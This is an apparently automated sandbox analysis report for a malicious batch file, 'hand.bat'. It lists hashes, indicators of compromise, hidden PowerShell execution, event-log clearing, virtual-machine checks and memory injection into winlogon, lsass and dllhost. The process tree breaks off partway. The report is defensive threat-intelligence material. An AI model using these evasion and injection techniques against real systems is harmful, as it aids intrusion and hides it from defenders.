698b1f0a35a76e57adef388612b29902f86f56983c772d7c6c17b4483c2be688

Analysis

max time kernel
150s
max time network
151s
platform
windows11-21h2_x64
resource
win11-20241007-en
resource tags

arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system
submitted
19-11-2024 21:24

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

hand.bat
Size

7.0MB
MD5

1a013c7ac90b58073895b26cae70def7
SHA1

60c9c3294fc7ac3d336a478274f62f4818498230
SHA256

698b1f0a35a76e57adef388612b29902f86f56983c772d7c6c17b4483c2be688
SHA512

c1bbb52e8546b352e041e944d7dfa158d5dc9a51b1628128d345e4a9e708871d7a1f5e59cc44a2c66f8dc9af81ec06e1b5105d5a7292497075564496f3b0ec75
SSDEEP

49152:vZrlGoT+Xts/LJjeDPnIwT0ZFBZP2x3fLKs0HMb0DprNMiKwPjp9Kw2EdF8d7nrx:Y

Score

10^/10

defense_evasion execution

Malware Config

Signatures

Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

description	pid	Process	procid_target
PID 4800 created 640	4800	powershell.exe	5

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
4800	powershell.exe
3504	powershell.exe

Indicator Removal: Clear Windows Event Logs 1 TTPs 8 IoCs

Clear Windows Event Logs to hide the activity of an intrusion.

defense_evasion

Clear Windows Event Logs

T1070.001

description	ioc	Process
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-TWinUI%4Operational.evtx	svchost.exe
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-WER-Diag%4Operational.evtx	svchost.exe
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-DxgKrnl-Admin.evtx	svchost.exe
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-DxgKrnl-Operational.evtx	svchost.exe
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Audio%4Operational.evtx	svchost.exe
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Audio%4CaptureMonitor.evtx	svchost.exe
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Audio%4PlaybackManager.evtx	svchost.exe
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-AppxPackaging%4Operational.evtx	svchost.exe

Drops file in System32 directory 3 IoCs

description	ioc	Process
File created	C:\Windows\system32\wbem\Performance\WmiApRpl_new.h	WMIADAP.EXE
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml	OfficeClickToRun.exe
File created	C:\Windows\system32\wbem\Performance\WmiApRpl_new.ini	WMIADAP.EXE

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 4800 set thread context of 5008	4800	powershell.exe	83

Drops file in Windows directory 2 IoCs

description	ioc	Process
File opened for modification	C:\Windows\$rbx-onimai2	powershell.exe
File created	C:\Windows\$rbx-onimai2\$rbx-CO2.bat	cmd.exe

Checks SCSI registry key(s) 3 TTPs 16 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags	dwm.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags	dwm.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0018	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000	dwm.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000	dwm.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags	dwm.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000	dwm.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000	dwm.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags	dwm.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0018	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0018	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0018	svchost.exe

Modifies data under HKEY_USERS 64 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	dwm.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColor = "3288365268"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\EnableWindowColorization = "186"	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	dwm.exe
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\StartColorMenu = "4290799360"	LogonUI.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe = "Tue, 19 Nov 2024 21:26:16 GMT"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E	dwm.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglow = "3288365268"	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache	dwm.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\RulesEndpoint = "https://nexusrules.officeapps.live.com/nexus/rules?Application=officeclicktorun.exe&Version=16.0.12527.20470&ClientId={64BB3CD5-F298-4409-BD20-168FD84FF663}&OSEnvironment=10&MsoAppId=37&AudienceName=Production&AudienceGroup=Production&AppVersion=16.0.12527.20470&"	OfficeClickToRun.exe
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationBlurBalance = "1"	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates	dwm.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentPalette = 99ebff004cc2ff000091f8000078d4000067c000003e9200001a6800f7630c00	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292114432"	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\CTF\RemoteSession	winlogon.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\CTF\RemoteSession\Profile	winlogon.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\CTF\RemoteSession\KeyboardLayout = "0"	winlogon.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft	dwm.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History\AutoColor = "0"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentColorMenu = "4292114432"	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor	OfficeClickToRun.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,7202269,17110992,41484365,39965824,7153487,17110988,508368333,17962391,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft	dwm.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1732051575"	OfficeClickToRun.exe

Modifies registry class 2 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\	Explorer.EXE

Suspicious behavior: EnumeratesProcesses 29 IoCs

pid	Process
4800	powershell.exe
4800	powershell.exe
4800	powershell.exe
5008	dllhost.exe
5008	dllhost.exe
5008	dllhost.exe
5008	dllhost.exe
5008	dllhost.exe
5008	dllhost.exe
5008	dllhost.exe
5008	dllhost.exe
3504	powershell.exe
3504	powershell.exe
3504	powershell.exe
5008	dllhost.exe
5008	dllhost.exe
5008	dllhost.exe
5008	dllhost.exe
5008	dllhost.exe
5008	dllhost.exe
5008	dllhost.exe
5008	dllhost.exe
3504	powershell.exe
5008	dllhost.exe
5008	dllhost.exe
5008	dllhost.exe
5008	dllhost.exe
5008	dllhost.exe
3504	powershell.exe

Suspicious behavior: LoadsDriver 64 IoCs

pid	Process
3472	Process not Found
1236	Process not Found
1700	Process not Found
1100	Process not Found
4956	Process not Found
1332	Process not Found
1408	Process not Found
3608	Process not Found
4268	Process not Found
2996	Process not Found
4448	Process not Found
1084	Process not Found
1240	Process not Found
3616	Process not Found
1236	Process not Found
580	Process not Found
652	Process not Found
2872	Process not Found
424	Process not Found
504	Process not Found
432	Process not Found
1700	Process not Found
3040	Process not Found
1880	Process not Found
840	Process not Found
5096	Process not Found
2172	Process not Found
860	Process not Found
1796	Process not Found
416	Process not Found
224	Process not Found
564	Process not Found
3184	Process not Found
788	Process not Found
3432	Process not Found
4968	Process not Found
1444	Process not Found
3608	Process not Found
4268	Process not Found
2996	Process not Found
3632	Process not Found
3368	Process not Found
3724	Process not Found
4924	Process not Found
3692	Process not Found
3800	Process not Found
1076	Process not Found
1380	Process not Found
904	Process not Found
5040	Process not Found
2828	Process not Found
1400	Process not Found
4448	Process not Found
4124	Process not Found
2932	Process not Found
3068	Process not Found
1844	Process not Found
4708	Process not Found
2792	Process not Found
1240	Process not Found
4128	Process not Found
3192	Process not Found
980	Process not Found
3868	Process not Found

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4800	powershell.exe
Token: SeDebugPrivilege	5008	dllhost.exe
Token: SeCreateGlobalPrivilege	3296	dwm.exe
Token: SeChangeNotifyPrivilege	3296	dwm.exe
Token: 33	3296	dwm.exe
Token: SeIncBasePriorityPrivilege	3296	dwm.exe
Token: SeCreateGlobalPrivilege	3176	dwm.exe
Token: SeChangeNotifyPrivilege	3176	dwm.exe
Token: 33	3176	dwm.exe
Token: SeIncBasePriorityPrivilege	3176	dwm.exe
Token: SeShutdownPrivilege	3372	Explorer.EXE
Token: SeCreatePagefilePrivilege	3372	Explorer.EXE
Token: SeCreateGlobalPrivilege	3440	dwm.exe
Token: SeChangeNotifyPrivilege	3440	dwm.exe
Token: 33	3440	dwm.exe
Token: SeIncBasePriorityPrivilege	3440	dwm.exe
Token: SeShutdownPrivilege	3372	Explorer.EXE
Token: SeCreatePagefilePrivilege	3372	Explorer.EXE
Token: SeShutdownPrivilege	3372	Explorer.EXE
Token: SeCreatePagefilePrivilege	3372	Explorer.EXE
Token: SeCreateGlobalPrivilege	2904	dwm.exe
Token: SeChangeNotifyPrivilege	2904	dwm.exe
Token: 33	2904	dwm.exe
Token: SeIncBasePriorityPrivilege	2904	dwm.exe
Token: SeShutdownPrivilege	3372	Explorer.EXE
Token: SeCreatePagefilePrivilege	3372	Explorer.EXE
Token: SeShutdownPrivilege	3372	Explorer.EXE
Token: SeCreatePagefilePrivilege	3372	Explorer.EXE
Token: SeCreateGlobalPrivilege	3152	dwm.exe
Token: SeChangeNotifyPrivilege	3152	dwm.exe
Token: 33	3152	dwm.exe
Token: SeIncBasePriorityPrivilege	3152	dwm.exe
Token: SeShutdownPrivilege	3372	Explorer.EXE
Token: SeCreatePagefilePrivilege	3372	Explorer.EXE
Token: SeShutdownPrivilege	3372	Explorer.EXE
Token: SeCreatePagefilePrivilege	3372	Explorer.EXE
Token: SeDebugPrivilege	3504	powershell.exe
Token: SeCreateGlobalPrivilege	4064	dwm.exe
Token: SeChangeNotifyPrivilege	4064	dwm.exe
Token: 33	4064	dwm.exe
Token: SeIncBasePriorityPrivilege	4064	dwm.exe
Token: SeShutdownPrivilege	3372	Explorer.EXE
Token: SeCreatePagefilePrivilege	3372	Explorer.EXE
Token: SeShutdownPrivilege	3372	Explorer.EXE
Token: SeCreatePagefilePrivilege	3372	Explorer.EXE
Token: SeCreateGlobalPrivilege	380	dwm.exe
Token: SeChangeNotifyPrivilege	380	dwm.exe
Token: 33	380	dwm.exe
Token: SeIncBasePriorityPrivilege	380	dwm.exe
Token: SeShutdownPrivilege	3372	Explorer.EXE
Token: SeCreatePagefilePrivilege	3372	Explorer.EXE
Token: SeShutdownPrivilege	3372	Explorer.EXE
Token: SeCreatePagefilePrivilege	3372	Explorer.EXE
Token: SeCreateGlobalPrivilege	4232	dwm.exe
Token: SeChangeNotifyPrivilege	4232	dwm.exe
Token: 33	4232	dwm.exe
Token: SeIncBasePriorityPrivilege	4232	dwm.exe
Token: SeShutdownPrivilege	3372	Explorer.EXE
Token: SeCreatePagefilePrivilege	3372	Explorer.EXE
Token: SeShutdownPrivilege	3372	Explorer.EXE
Token: SeCreatePagefilePrivilege	3372	Explorer.EXE
Token: SeShutdownPrivilege	3372	Explorer.EXE
Token: SeCreatePagefilePrivilege	3372	Explorer.EXE
Token: SeAuditPrivilege	2588	svchost.exe

Suspicious use of FindShellTrayWindow 2 IoCs

pid	Process
3372	Explorer.EXE
3372	Explorer.EXE

Suspicious use of SendNotifyMessage 30 IoCs

pid	Process
3372	Explorer.EXE
3372	Explorer.EXE
3372	Explorer.EXE
3372	Explorer.EXE
3372	Explorer.EXE
3372	Explorer.EXE
3372	Explorer.EXE
3372	Explorer.EXE
3372	Explorer.EXE
3372	Explorer.EXE
3372	Explorer.EXE
3372	Explorer.EXE
3372	Explorer.EXE
3372	Explorer.EXE
3372	Explorer.EXE
3372	Explorer.EXE
3372	Explorer.EXE
3372	Explorer.EXE
3372	Explorer.EXE
3372	Explorer.EXE
3372	Explorer.EXE
3372	Explorer.EXE
3372	Explorer.EXE
3372	Explorer.EXE
3372	Explorer.EXE
3372	Explorer.EXE
3372	Explorer.EXE
3372	Explorer.EXE
3372	Explorer.EXE
3372	Explorer.EXE

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
5060	LogonUI.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3120 wrote to memory of 4308	3120	cmd.exe	81
PID 3120 wrote to memory of 4308	3120	cmd.exe	81
PID 3120 wrote to memory of 4800	3120	cmd.exe	82
PID 3120 wrote to memory of 4800	3120	cmd.exe	82
PID 4800 wrote to memory of 5008	4800	powershell.exe	83
PID 4800 wrote to memory of 5008	4800	powershell.exe	83
PID 4800 wrote to memory of 5008	4800	powershell.exe	83
PID 4800 wrote to memory of 5008	4800	powershell.exe	83
PID 4800 wrote to memory of 5008	4800	powershell.exe	83
PID 4800 wrote to memory of 5008	4800	powershell.exe	83
PID 4800 wrote to memory of 5008	4800	powershell.exe	83
PID 4800 wrote to memory of 5008	4800	powershell.exe	83
PID 5008 wrote to memory of 640	5008	dllhost.exe	5
PID 5008 wrote to memory of 696	5008	dllhost.exe	7
PID 5008 wrote to memory of 996	5008	dllhost.exe	12
PID 5008 wrote to memory of 548	5008	dllhost.exe	13
PID 696 wrote to memory of 2576	696	lsass.exe	44
PID 696 wrote to memory of 2576	696	lsass.exe	44
PID 696 wrote to memory of 2576	696	lsass.exe	44
PID 5008 wrote to memory of 772	5008	dllhost.exe	14
PID 5008 wrote to memory of 724	5008	dllhost.exe	15
PID 5008 wrote to memory of 1064	5008	dllhost.exe	16
PID 5008 wrote to memory of 1088	5008	dllhost.exe	17
PID 5008 wrote to memory of 1128	5008	dllhost.exe	18
PID 5008 wrote to memory of 1152	5008	dllhost.exe	19
PID 5008 wrote to memory of 1248	5008	dllhost.exe	21
PID 5008 wrote to memory of 1288	5008	dllhost.exe	22
PID 5008 wrote to memory of 1356	5008	dllhost.exe	23
PID 4800 wrote to memory of 4724	4800	powershell.exe	87
PID 4800 wrote to memory of 4724	4800	powershell.exe	87
PID 696 wrote to memory of 2576	696	lsass.exe	44
PID 696 wrote to memory of 2576	696	lsass.exe	44
PID 5008 wrote to memory of 1492	5008	dllhost.exe	24
PID 5008 wrote to memory of 1508	5008	dllhost.exe	25
PID 5008 wrote to memory of 1592	5008	dllhost.exe	26
PID 5008 wrote to memory of 1608	5008	dllhost.exe	27
PID 5008 wrote to memory of 1716	5008	dllhost.exe	28
PID 5008 wrote to memory of 1724	5008	dllhost.exe	29
PID 5008 wrote to memory of 1776	5008	dllhost.exe	30
PID 5008 wrote to memory of 1872	5008	dllhost.exe	31
PID 5008 wrote to memory of 1884	5008	dllhost.exe	32
PID 5008 wrote to memory of 1952	5008	dllhost.exe	33
PID 5008 wrote to memory of 1968	5008	dllhost.exe	34
PID 5008 wrote to memory of 1052	5008	dllhost.exe	35
PID 5008 wrote to memory of 1172	5008	dllhost.exe	36
PID 5008 wrote to memory of 2104	5008	dllhost.exe	37
PID 640 wrote to memory of 3296	640	winlogon.exe	89
PID 640 wrote to memory of 3296	640	winlogon.exe	89
PID 5008 wrote to memory of 3296	5008	dllhost.exe	89
PID 696 wrote to memory of 2576	696	lsass.exe	44
PID 5008 wrote to memory of 2212	5008	dllhost.exe	39
PID 5008 wrote to memory of 2432	5008	dllhost.exe	40
PID 5008 wrote to memory of 2440	5008	dllhost.exe	41
PID 5008 wrote to memory of 2480	5008	dllhost.exe	42
PID 5008 wrote to memory of 2532	5008	dllhost.exe	43
PID 5008 wrote to memory of 2576	5008	dllhost.exe	44
PID 4800 wrote to memory of 2380	4800	powershell.exe	90
PID 4800 wrote to memory of 2380	4800	powershell.exe	90
PID 696 wrote to memory of 2576	696	lsass.exe	44
PID 696 wrote to memory of 2576	696	lsass.exe	44
PID 5008 wrote to memory of 2588	5008	dllhost.exe	45
PID 5008 wrote to memory of 2616	5008	dllhost.exe	46
PID 640 wrote to memory of 3176	640	winlogon.exe	226
PID 640 wrote to memory of 3176	640	winlogon.exe	226

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
- Modifies data under HKEY_USERS
- Suspicious use of WriteProcessMemory
PID:640
- C:\Windows\system32\dwm.exe
  "dwm.exe"
  2⤵
  PID:548
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{c1906579-d414-40e0-be3d-afde0745f167}
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:5008
- C:\Windows\system32\dwm.exe
  "dwm.exe"
  2⤵
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:3296
- C:\Windows\system32\dwm.exe
  "dwm.exe"
  2⤵
  - Checks SCSI registry key(s)
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:3176
- C:\Windows\system32\dwm.exe
  "dwm.exe"
  2⤵
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:3440
- C:\Windows\system32\dwm.exe
  "dwm.exe"
  2⤵
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:2904
- C:\Windows\system32\dwm.exe
  "dwm.exe"
  2⤵
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:3152
- C:\Windows\system32\dwm.exe
  "dwm.exe"
  2⤵
  - Checks SCSI registry key(s)
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:4064
- C:\Windows\system32\dwm.exe
  "dwm.exe"
  2⤵
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:380
- C:\Windows\system32\dwm.exe
  "dwm.exe"
  2⤵
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:4232
- C:\Windows\system32\LogonUI.exe
  "LogonUI.exe" /flags:0x0 /state0:0xa3a1d855 /state1:0x41c64e6d
  2⤵
  - Modifies data under HKEY_USERS
  - Suspicious use of SetWindowsHookEx
  PID:5060

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
- Suspicious use of WriteProcessMemory
PID:696

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
1⤵
PID:996

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
1⤵
PID:772

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
1⤵
PID:724

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
1⤵
PID:1064

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
1⤵
PID:1088

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
1⤵
PID:1128

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
1⤵
PID:1152

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netprofm -p -s netprofm
1⤵
PID:1248

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
1⤵
PID:1288

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
1⤵
PID:1356
- C:\Windows\system32\sihost.exe
  sihost.exe
  2⤵
  PID:2564

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
1⤵
PID:1492

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
1⤵
- Indicator Removal: Clear Windows Event Logs
PID:1508

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
1⤵
PID:1592

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
1⤵
PID:1608

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p
1⤵
PID:1716

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
1⤵
PID:1724

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
1⤵
PID:1776

C:\Windows\system32\svchost.exe
